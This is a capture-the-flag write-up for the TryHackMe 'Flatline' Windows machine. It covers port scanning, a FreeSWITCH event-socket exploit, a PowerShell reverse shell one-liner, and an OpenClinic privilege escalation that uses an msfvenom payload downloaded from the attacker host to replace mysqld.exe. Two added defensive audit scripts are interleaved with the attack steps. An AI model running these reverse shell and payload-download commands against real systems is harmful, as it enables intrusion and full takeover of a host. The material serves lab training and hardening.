THM Writeup – Flatline

How low are your morals?
Add the IP address to your hosts file:
echo '10.10.143.60    flatline.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv flatline.thm
PORT     STATE SERVICE       REASON
3389/tcp open  ms-wbt-server syn-ack ttl 128
8021/tcp open  ftp-proxy     syn-ack ttl 128
Get more details about the open ports:
nmap -T4 -A -p 3389,8021 flatline.thm
PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
|_ssl-date: 2022-03-08T08:01:07+00:00; 0s from scanner time.
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
3389 is the Remote Desktop Protocol; 8021 is an unusual port running a service named FreeSWITCH (its mod_event_socket interface).
Let’s first check whether RDP is vulnerable to BlueKeep (CVE-2019-0708) – start Metasploit and search for bluekeep:
msfconsole
msf5 > search bluekeep
Matching Modules
================
    #  Name                                            Disclosure Date  Rank    Check  Description
    -  ----                                            ---------------  ----    -----  -----------
    0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
    1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Select the scanner, configure it and run it:
msf5 > use 0
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options
Module options (auxiliary/scanner/rdp/cve_2019_0708_bluekeep):
    Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
    RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
    RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
    RDP_DOMAIN                        no        The client domain name to report during connect
    RDP_USER                          no        The username to report during connect, UNSET = random
    RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT            3389             yes       The target port (TCP)
    THREADS          1                yes       The number of concurrent threads (max one per host)
Auxiliary action:
    Name  Description
    ----  -----------
    Scan  Scan for exploitable targets
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts flatline.thm
rhosts => flatline.thm
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
[*] flatline.thm:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) >
The scanner reports nothing, so RDP is not vulnerable to BlueKeep in our case – a vulnerable host would be flagged in the scanner output.
Now find out what FreeSWITCH is – search for freeswitch github:

According to README.md:
“FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a versatile software implementation that runs on any commodity hardware. From a Raspberry PI to a multi-core server, FreeSWITCH can unlock the telecommunications potential of any device. Combined with our hosted cloud platform, SignalWire, FreeSWITCH can interconnect with the outside world and scale to any size.”
Try to find a way to exploit it – search for freeswitch exploit:

Great, we found an exploit.
Copy the exploit, save it to a file named e.g. exploit.py and make it executable:
nano exploit.py
chmod +x exploit.py
Run the exploit with a simple command to prove that it works:
root@ip-10-10-237-164:~# python3 exploit.py flatline.thm whoami
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
The exploit works, so now it’s time to get a reverse shell.
Save this PowerShell command (don’t forget to change the IP and port) to a file named e.g. revshell.ps1:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.237.164',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Set up a netcat listener:
nc -lnvp 4242
Run the exploit again, this time passing the contents of the file as the command:
python3 exploit.py flatline.thm "$(cat revshell.ps1)"
And the reverse connection is received:

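The command execution above is possible because the FreeSWITCH event socket on port 8021 is reachable from the network and accepts its shipped credentials. The following audit script is an added example, not code from the writeup or from the FreeSWITCH project: it reads the event socket configuration and flags the settings that expose it. It assumes the product's standard layout under C:\Program Files\FreeSWITCH (the path seen in the shell above), with the event socket configured in conf\autoload_configs\event_socket.conf.xml; the wildcard listen-ip "::" and the password "ClueCon" are the product's documented defaults, not values taken from this writeup.

```powershell
# Added hardening check (not part of the writeup): inspect FreeSWITCH's
# event_socket.conf.xml for settings that let any remote client authenticate
# and run "api" commands, which is what the exploit above does on port 8021.
# Assumption: standard install path; run on the FreeSWITCH host itself.

$ConfigPath = 'C:\Program Files\FreeSWITCH\conf\autoload_configs\event_socket.conf.xml'

function Get-EventSocketFindings {
    param([string]$Path)
    [xml]$doc = Get-Content -LiteralPath $Path -Raw
    # Collect <param name="..." value="..."/> entries into a hashtable.
    $params = @{}
    foreach ($p in $doc.configuration.settings.param) { $params[$p.name] = $p.value }

    $findings = @()
    $listen = $params['listen-ip']
    if (-not $listen -or $listen -in @('::', '0.0.0.0')) {
        $findings += "listen-ip is '$listen' (all interfaces); bind to 127.0.0.1 or ::1 unless remote ESL clients are required"
    }
    if (-not $params['password'] -or $params['password'] -eq 'ClueCon') {
        $findings += "password is missing or the documented default; set a long random value"
    }
    if (-not $params['apply-inbound-acl']) {
        $findings += "apply-inbound-acl is not set; restrict source addresses with an ACL"
    }
    return $findings
}

$results = @(Get-EventSocketFindings -Path $ConfigPath)
if ($results.Count -eq 0) { 'event_socket: no weak settings found' } else { $results }
```

A host-based firewall rule limiting 8021/tcp to management addresses is the quickest stop-gap while the configuration is changed.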
Find the user flag and read it:
pwd
Path                       
----                       
C:\Program Files\FreeSWITCH
PS C:\Program Files\FreeSWITCH> cd C:\Users
PS C:\Users> dir
    Directory: C:\Users
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:13                Administrator                                                         
d-----       09/11/2021     07:37                Nekrotic                                                              
d-r---       09/11/2021     07:13                Public
PS C:\Users> cd Nekrotic\Desktop
PS C:\Users\Nekrotic\Desktop> dir
    Directory: C:\Users\Nekrotic\Desktop
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       09/11/2021     07:39             38 root.txt                                                              
-a----       09/11/2021     07:39             38 user.txt
PS C:\Users\Nekrotic\Desktop> more user.txt
[REDACTED]
As we can see there is also a root flag, but we don’t have permission to read it – we have to escalate our privileges to NT AUTHORITY\SYSTEM.
Now let’s do some basic enumeration and see what we can find on the disk:
PS C:\Users\Nekrotic\Desktop> cd C:\
PS C:\> dir
    Directory: C:\
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       15/09/2018     08:19                PerfLogs                                                              
d-r---       09/11/2021     16:41                Program Files                                                         
d-----       09/11/2021     07:13                Program Files (x86)                                                   
d-----       09/11/2021     07:18                projects                                                              
d-r---       09/11/2021     07:28                Users                                                                 
d-----       09/11/2021     16:47                Windows
The projects folder looks interesting, let’s check it out:
PS C:\> cd projects
PS C:\projects> dir
    Directory: C:\projects
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                openclinic                                                            
PS C:\projects> cd openclinic
PS C:\projects\openclinic> dir
    Directory: C:\projects\openclinic
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe
OK, the projects folder contains a folder named openclinic – judging by the bundled JDK, MariaDB and Tomcat, it is some sort of open-source software.
Find out what OpenClinic is – search for openclinic:

We know what it is, now find a way to exploit it – use either Google or searchsploit.
By googling openclinic exploit:

We found a proof-of-concept:
# Proof of Concept
1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe
2. Setup listener and ensure apache is running on attacking machine
    nc -lvp 4242
    service apache2 start
3. Download malicious .exe on victim machine
    type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
    Rename C:\projects\openclinic\mariadb\bin\mysqld.exe > mysqld.bak
    Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
    C:\Windows\system32>whoami
    whoami
    nt authority\system
Follow the PoC:
1. Generate a Windows reverse shell (don’t forget to modify the IP and port) and start a Python HTTP server:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.237.164 LPORT=4444 -f exe > mysqld_evil.exe
python3 -m http.server
2. Open another terminal window and set up a netcat listener:
nc -lnvp 4444
3. Go back to the terminal with the reverse shell connection, rename mysqld.exe to mysqld.bak and download the malicious .exe file:
PS C:\projects\openclinic> cd mariadb\bin
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.bak
PS C:\projects\openclinic\mariadb\bin> Invoke-WebRequest -Uri http://10.10.237.164:8000/mysqld_evil.exe -Outfile mysqld.exe
4. Restart the target computer:
PS C:\projects\openclinic\mariadb\bin> Restart-Computer
After the restart we receive a reverse connection:

Check which user we are connected as, go to Nekrotic’s desktop and read the root flag:
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Nekrotic\Desktop
cd C:\Users\Nekrotic\Desktop
C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
[REDACTED]
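The escalation works only because a standard user can rename and replace mysqld.exe under C:\projects\openclinic\mariadb\bin, a binary that a SYSTEM service launches at boot. The audit script below is an added example (not code from the writeup or from OpenClinic) that finds this class of weakness on a Windows host: auto-start services running as LocalSystem whose executable, or the folder containing it, grants write, delete or permission-change rights to low-privileged principals. It assumes it is run from an elevated PowerShell session on the host being audited.

```powershell
# Added audit (example code, not from the writeup): list SYSTEM services whose
# binary or binary folder can be modified by a low-privileged principal, the
# weakness the OpenClinic PoC abuses. Assumption: run elevated on the host.

$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that allow replacing, renaming or re-permissioning a file in the folder.
$DangerousRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Get-WeakAce {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Bitwise test so combined rights such as Modify or FullControl are caught too.
        if (([int]$ace.FileSystemRights -band [int]$DangerousRights) -ne 0) {
            return "$($ace.IdentityReference) has $($ace.FileSystemRights) on $Path"
        }
    }
    return $null
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may be quoted and carry arguments; keep only the executable itself.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' } |
    ForEach-Object {
        $exe = Get-ServiceBinaryPath -PathName $_.PathName
        $weak = @((Get-WeakAce -Path $exe), (Get-WeakAce -Path (Split-Path -Parent $exe))) |
                Where-Object { $_ }
        if ($weak) {
            [PSCustomObject]@{ Service = $_.Name; Binary = $exe; Finding = ($weak -join '; ') }
        }
    }
```

Any service the script lists should have its folder re-permissioned so that only Administrators and SYSTEM can write, and the binary should be compared against a known-good hash before the host is trusted again.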